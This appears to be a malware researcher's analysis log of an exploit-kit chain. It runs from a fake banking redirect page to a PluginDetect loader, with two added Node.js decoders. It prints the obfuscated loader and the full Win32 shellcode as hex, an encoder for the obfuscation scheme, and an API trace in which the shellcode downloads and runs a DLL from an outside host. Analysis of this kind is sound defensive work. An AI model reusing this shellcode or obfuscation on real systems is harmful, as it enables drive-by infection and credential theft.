- # MalwareMustDie - PluginDetect Decoding Guide
- # for the Trojan parfeit Investigation
- # (Credential Stealer Case)
- ------------
- --18:06:57-- h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
- => `cpa_inform.htm'
- Resolving www.irwra.com... 50.116.98.44
- Connecting to www.irwra.com|50.116.98.44|:80... connected.
- HTTP request sent, awaiting response... HTTP/1.1 200 OK
- // real time with Xurl..
- @unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
- % Total % Received % Xferd Average Speed Time Time Time Current
- Dload Upload Total Spent Left Speed
- 100 813 100 813 0 0 1187 0 --:--:-- --:--:-- --:--:-- 4567
- <html>
- <head>
- <title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>
- <script type="text/javascript">
- <!--
- location.replace("h00p://latticesoft.net/detects/continues-little.php");
- //-->
- </script>
- <noscript>
- <meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
- </noscript>
- </head>
- <h1>You will be redirected to details of purchase</h1>
- <h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>
- <h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>
- <h3>Redirecting to Survey details... Please wait...</h3>
- </html>
- ------------------------------------------------
- --2012-12-22 03:44:27-- h00p://latticesoft.net/detects/continues-little.php
- Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
- Caching latticesoft.net => 59.57.247.185
- Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
- ---request begin---
- GET /detects/continues-little.php HTTP/1.1
- Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
- User-Agent: #MalwareMustDie!
- Accept: */*
- Host: latticesoft.net
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Server: nginx/1.3.3
- Date: Fri, 21 Dec 2012 18:44:29 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: close
- X-Powered-By: PHP/5.3.14
- 200 OK
- Length: unspecified [text/html]
- Saving to: `continues-little.php'
- 2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
- --------------------------------------------------------
- TRY TWO:
- --14:18:07-- h00p://latticesoft.net/detects/continues-little.php
- => `continues-little.php.1'
- Resolving latticesoft.net... seconds 0.00, 59.57.247.185
- Caching latticesoft.net => 59.57.247.185
- Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
- Created socket 1896.
- Releasing 0x003d5348 (new refcount 1).
- ---request begin---
- GET /detects/continues-little.php HTTP/1.0
- Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
- Accept: */*
- Host: latticesoft.net
- Connection: Keep-Alive
- ---request end---
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Server: nginx/1.3.3
- Date: Sat, 22 Dec 2012 05:17:56 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14
- ---response end---
- 200 OK
- Length: unspecified [text/html]
- 14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337] <=============== the size changes....
- ---------------
- // CHANGES!!!!!! Why? What?
- // what had changed??
- // let's use the unix diff command to compare the previous code with the new one and see what changes the moronz made:
- 0x001c1
- < <html><head><title></title></head><body>
- <applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="hw">
- <param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="val"/>
- <param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="prime" />
- </applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){
- 0x007c7
- < <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
- 2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
- 6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
- 3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
- 271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
- 7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
- 7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
- 8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
- -8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
- -5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
- -16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
- -7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
- -8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6
- 0x018c18
- < if(a["su"+"bstr"](i,1)=="-")i+=2;
- ---
- > if(a["substr"](i,1)=="-")i+=2;
- // yep, the moronz changed the jar applet infector (0x001c1) &
- // changed the obfuscated data (0x007c7) and also -
- // made the strings of the obfs generator code more scattered (0x018c18)
- // These three changes suggest the payload has changed.
- // Nevermind the old payload, let's get into the new one!
- --------------------------------------------------------
- // See the latest code...
- // let's strip the garbage html code & make it more viewable..
- // then see which are the parts of the obfuscation & its structure,
- // and recognize where the obfuscated data feed code & the decoding generator code are.
- // After that go to the obfuscation part and understand the structure < important!
- // In this case those malware moronz are splitting the obfuscation code within a.setAttribute()
- // arrays using script tags, just adjust them by deleting all <script></script>
- // tags and you're good to go.
- // So, the structure of the current obfuscated data is (the only characters used are '-'
- // and the base-23 digits 0-9 a-m, since the decoder does parseInt(..., 23)):
- a.setAttribute("z0","-[0-9a-m]...-[0-9a-m]");
- z1
- :
- z29
- // And this is the code to feed obfuscated data...
- dd="i";
- pp="e"+"In";
- asd=function()
- {
- for(i=0;;i++)
- {
- r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
- }};
- a=document.createElement(dd);
- // Thus, this is the generator part to crack the code;
- document.body.appendChild(a);
- if(document.getElementsByTagName("d"+"iv")[0].style.left==="") // needs the empty <div> from the html and a real style object; an emulator failing this check never reaches the decoder
- {
- ss=String.fromCharCode;
- a=document["getElementsB"+"yTagName"](dd);
- a=a[0];
- s=new String();
- asd();
- a=s;
- s=new String();
- e=window["eva"+"l"];
- p=parseInt;
- for(i=0;a.length>i;i+=2)
- {
- if(a["su"+"bstr"](i,1)=="-")i+=2;
- s=s+(ss((p(a["substr"](i,2),23)-24)/3));
- }
- try
- {
- document.body*=document; // assigning a non-element to document.body throws in a real browser, so control falls into the catch
- }
- catch(asfas)
- {
- e("if(1)"+s); // the decoded code is only eval'd from the catch: an emulator where the line above doesn't throw never runs the payload
- }
- }
- // And this is the logic formula to crack :
- // here's the formula...
- for(i=0;a.length>i;i+=2)
- {
- if(a["substr"](i,1)=="-")i+=2;
- s=s+(ss((p(a["substr"](i,2),23)-24)/3));
- }
- // You can manipulate the decoding operation easily by making
- // an array for the a element, feeding the array 0 to 29 with
- // the garbled code one by one, and then feeding it into the
- // formula.
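Added example (not the page's code): the formula above turned into a standalone Node.js decoder that joins the z0..zN chunks the way asd() does, applies the base-23 arithmetic, and returns the text instead of eval()ing it. It also carries the inverse (n = 3*c + 24 written as two base-23 digits, with a "-" plus one filler digit in front of every three pairs, mirroring the captured data) so a sample can be generated and the round trip checked. The z-attribute data shown on the page is from the old version captured by diff, so the sample here is constructed, not the real data.

```javascript
// Added example: standalone decoder for the a.setAttribute("zN", ...) scheme above.
// Runs under Node.js; nothing here touches the DOM and nothing is eval()'d.

// Same loop as asd(): concatenate z0, z1, ... until the first missing chunk.
function joinChunks(chunks) {
  let s = "";
  for (let i = 0; ; i++) {
    const r = chunks[i];
    if (r) s += r; else break;
  }
  return s;
}

// The page's formula: skip "-" plus one filler char, then every two chars are one
// base-23 number n and the plaintext char code is (n - 24) / 3.
function decodeZ(chunks) {
  const a = joinChunks(chunks);
  let s = "";
  for (let i = 0; a.length > i; i += 2) {
    if (a.substr(i, 1) === "-") i += 2;
    if (i + 2 > a.length) break; // guard: the original would feed "" to parseInt here
    const n = parseInt(a.substr(i, 2), 23);
    if (Number.isNaN(n) || (n - 24) % 3 !== 0) {
      throw new Error("bad pair at " + i + ": " + a.substr(i, 2));
    }
    s += String.fromCharCode((n - 24) / 3);
  }
  return s;
}

// Inverse, to build test data: n = 3*c + 24 as two base-23 digits (0-9, a-m), with
// "-" and one filler digit before every three pairs. The result is cut into chunks
// of chunkLen chars; boundaries can fall anywhere because asd() re-joins them first.
function encodeZ(text, chunkLen = 40) {
  let body = "";
  for (let k = 0; k < text.length; k++) {
    const n = 3 * text.charCodeAt(k) + 24;
    if (n > 22 * 23 + 22) throw new Error("char code too large for two base-23 digits");
    if (k % 3 === 0) body += "-" + ((k * 7 + 3) % 23).toString(23); // filler, skipped by the decoder
    body += n.toString(23).padStart(2, "0");
  }
  const chunks = [];
  for (let i = 0; i < body.length; i += chunkLen) chunks.push(body.slice(i, i + chunkLen));
  return chunks;
}

// Demo: encode a constructed snippet, show the z-chunks, decode them again.
const demoChunks = encodeZ('var PluginDetect = {version:"0.7.9"};');
console.log(demoChunks);
console.log(decodeZ(demoChunks));
```

To use it on a real sample, paste the 30 attribute values into the array in order (z0 first); the decoder returns the PluginDetect source as a string for reading or diffing, and a pair that is not a valid base-23 number or does not decode to a whole char code raises an error instead of silently producing garbage the way String.fromCharCode on a fraction would.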
- //And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)
- var PluginDetect =
- {
- version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
- {
- return function ()
- {
- c(b, a)
- }
- }
- , openTag : "<", isDefined : function (b)
- {
- return typeof b != "undefined"
- }
- , isArray : function (b)
- {
- return (/array/i).test(Object.prototype.toString.call(b))
- :
- :(blah! etc)
- //let's modify shellcode to grab the payload:
- var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var x=a["replace"](/\%!/g, "%" + "u");
- document.write(x);
- ↓↓
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
- // here's the shellcode (in bin & text)....
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 08 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 44 49 5c 5c 41 4b 4d 5b X@\\X...DI\\AKM[
- 47 4e 5c 06 46 4d 5c 07 4c 4d 5c 4d 4b 5c 5b 07 GN\.FM\.LM\MK\[.
- 4b 47 46 5c 41 46 5d 4d 5b 05 44 41 5c 5c 44 4d KGF\AF]M[.DA\\DM
- 06 58 40 58 17 52 4e 15 1b 18 12 1a 5e 12 19 4e .X@X.RN.....^..N
- 12 19 42 12 1b 18 0e 4f 4d 15 19 46 12 1a 5f 12 ..B....OM..F.._.
- 19 41 12 19 42 12 19 47 12 19 41 12 19 4f 12 1a .A..B..G..A..O..
- 5e 12 19 45 12 19 45 0e 44 15 19 43 0e 41 5f 15 ^..E..E.D..C.A_.
- 52 0e 40 4e 15 4c 28 28 R.@N.L((
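Added example (not the author's code): a Node.js script that performs the page's reverse-and-replace step, then does what unescape() and the heap spray do with the result (each %uXXXX becomes two little-endian bytes), prints a hexdump in the style of the listing above, and finally strips the XOR layer that the first 32 bytes of the dump remove at runtime. The stub's key (0x28) and length (504 bytes, from sub cx,0xfe08) are read from the bytes rather than assumed, and the function refuses bytes whose stub does not match. SAMPLE is constructed from the last 24 words of the decoded %u listing above, so only the first 16 payload bytes come out here; run it on the full string from the page for the whole decoded shellcode.

```javascript
// Added example: reverse, "%!" -> "%u", %uXXXX -> little-endian bytes, then undo the
// XOR decoder stub. Runs under Node.js. SAMPLE = last 24 words of the page's listing.
const SAMPLE = "423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!" +
               "%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%";

// Exactly what the page's "var x = ..." line does, minus document.write().
function deobfuscate(a) {
  return a.split("").reverse().join("").replace(/%!/g, "%u");
}

// What unescape() plus a heap spray turn the %u string into: each UTF-16 code unit is
// stored little-endian, so %u8366 becomes the bytes 66 83.
function toBytes(escaped) {
  const out = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    const v = parseInt(m[1], 16);
    out.push(v & 0xff, v >> 8);
  }
  return out;
}

function toHex(bytes) {
  return bytes.map((b) => b.toString(16).padStart(2, "0")).join("");
}

// 16 bytes per row, hex then printable ASCII, like the page's listing.
function hexdump(bytes) {
  const rows = [];
  for (let i = 0; i < bytes.length; i += 16) {
    const row = bytes.slice(i, i + 16);
    const hex = row.map((b) => b.toString(16).padStart(2, "0")).join(" ");
    const asc = row.map((b) => (b >= 0x20 && b < 0x7f ? String.fromCharCode(b) : ".")).join("");
    rows.push(hex.padEnd(47) + "  " + asc);
  }
  return rows.join("\n");
}

// The first 32 bytes of the dump are a self-decoding stub (offsets from byte 0):
//   4: 66 83 e4 fc     and sp, 0xfffc
//   8: fc              cld
//   9: eb 10           jmp 27
//  11: 58              pop eax            ; eax = 32, pushed by the call below
//  12: 31 c9           xor ecx, ecx
//  14: 66 81 e9 08 fe  sub cx, 0xfe08     ; cx = 0x01f8 = 504 bytes to decode
//  19: 80 30 28        xor byte [eax], 0x28
//  22: 40              inc eax
//  23: e2 fa           loop 19
//  25: eb 05           jmp 32
//  27: e8 eb ff ff ff  call 11
//  32: XOR-encoded payload
// Read key and length from the stub instead of hard-coding them, and refuse anything else.
function unwrapXorStub(bytes) {
  const stubOk = bytes[14] === 0x66 && bytes[15] === 0x81 && bytes[16] === 0xe9 &&
                 bytes[19] === 0x80 && bytes[20] === 0x30 && bytes[23] === 0xe2 &&
                 bytes[27] === 0xe8;
  if (!stubOk) throw new Error("decoder stub not where expected; inspect manually");
  const key = bytes[21];
  const imm = bytes[17] | (bytes[18] << 8);
  const count = (0x10000 - imm) & 0xffff;   // 0 - imm in the 16-bit cx register
  const start = 27 + 5;                      // return address pushed by the call = byte after it
  const n = Math.min(count, bytes.length - start);
  const payload = bytes.slice(start, start + n).map((b) => b ^ key);
  return { key, count, payload };
}

const bytes = toBytes(deobfuscate(SAMPLE));
console.log(hexdump(bytes));
const { key, count, payload } = unwrapXorStub(bytes);
console.log("xor key 0x" + key.toString(16) + ", " + count + " bytes encoded; decoded so far:");
console.log(hexdump(payload));
```

Even on this short sample the decoded payload shows, from its seventh byte, 33 c0 64 8b 40 30 8b 40 0c (xor eax,eax / mov eax,fs:[eax+0x30] / mov eax,[eax+0x0c]), the usual PEB walk position-independent Win32 shellcode uses to find loaded modules, which is what to expect in front of the kernel32 and urlmon calls in the API trace below.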
- // And the translation of the API.....
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- ----
- #MalwareMustDie!
- unixfreaxjp /malware]$ date
- Sat Dec 22 18:59:02 JST 2012